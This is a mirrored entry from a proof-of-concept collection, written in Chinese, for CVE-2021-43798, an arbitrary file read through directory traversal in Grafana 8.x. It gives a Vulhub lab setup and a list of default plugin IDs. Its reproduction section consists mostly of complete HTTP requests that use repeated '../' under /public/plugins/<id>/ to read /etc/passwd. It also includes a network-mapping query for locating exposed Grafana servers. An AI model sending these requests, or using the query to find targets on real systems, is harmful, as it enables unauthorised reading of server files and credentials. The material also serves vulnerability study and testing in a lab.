admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 11:27:43 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/Grafana 8.x 插件模块目录穿越漏洞 CVE-2021-43798.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

91 lines
2.6 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Grafana 8.x 插件模块目录穿越漏洞 CVE-2021-43798
## 漏洞描述
Grafana 是一个开源的度量分析与可视化套件。在 2021 年 12 月,推特用户@j0v 发表了他发现的一个 0day攻击者利用这个漏洞可以读取服务器上的任意文件。
参考链接:
- https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/
- https://twitter.com/hacker_/status/1467880514489044993
- https://nosec.org/home/detail/4914.html
- https://mp.weixin.qq.com/s/dqJ3F_fStlj78S0qhQ3Ggw
- https://codeload.github.com/grafana/grafana/zip/refs/tags/v8.3.0 source code
## 漏洞影响
```
Grafana 8.x
```
## 网络测绘
```
app="Grafana_Labs-公司产品"
```
## 环境搭建
Vulhub 执行如下命令启动一个 Grafana 8.2.6 版本服务器:
```
docker compose up -d
```
服务启动后,访问 `http://your-ip:3000` 即可查看登录页面,但是这个漏洞是无需用户权限的。
![](images/Grafana%208.x%20插件模块目录穿越漏洞%20CVE-2021-43798/image-20241105154049299.png)
## 漏洞复现
这个漏洞出现在插件模块中,这个模块支持用户访问插件目录下的文件,但因为没有对文件名进行限制,攻击者可以利用 `../` 的方式穿越目录,读取到服务器上的任意文件。
利用这个漏洞前,我们需要先获取到一个已安装的插件 id比如常见的有
```
alertlist
cloudwatch
dashlist
elasticsearch
graph
graphite
heatmap
influxdb
mysql
opentsdb
pluginlist
postgres
prometheus
stackdriver
table
text
```
再发送如下数据包,读取任意文件:
```
GET /public/plugins/alertlist/../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: your-ip:3000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Connection: close
```
![](images/Grafana%208.x%20插件模块目录穿越漏洞%20CVE-2021-43798/image-20241105154903522.png)
也可以将其中的 `alertlist` 换成其他合法的插件 id例如 `graph`
```
GET /public/plugins/graph/../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: your-ip:3000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Connection: close
```
![](images/Grafana%208.x%20插件模块目录穿越漏洞%20CVE-2021-43798/image-20241105154832584.png)
Reference in New Issue View Git Blame Copy Permalink